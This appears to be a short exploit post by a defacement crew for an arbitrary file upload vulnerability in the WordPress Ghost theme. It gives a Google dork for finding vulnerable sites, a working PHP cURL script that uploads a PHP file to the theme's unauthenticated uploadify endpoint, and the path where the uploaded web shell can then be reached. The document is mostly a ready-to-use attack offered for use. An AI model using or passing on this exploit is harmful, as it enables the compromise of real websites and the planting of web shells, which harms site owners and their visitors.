Assalamuallaikum Wr.Wb
PriaPolos Here !!!
- # Exploit Title: WordPress Ghost theme - Arbitrary File Upload Vulnerability
- # Author: DaOne aka MockingBird
- # Vendor Homepage: http://freelancewp.com/wordpress-theme/ghost-theme/
- # Category: webapps/php
- # Google dork: inurl:wp-content/themes/Ghost/
<?php
$uploadfile="PriaPolos.php";
$ch = curl_init("http://[target]/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Location Shell :
http://[target]/wp-content/uploads/settingsimages/NameYourShell.php
Credits :
Faizal Affandy aKa PriaPolos | Extreme Crew | PhantomGhost -
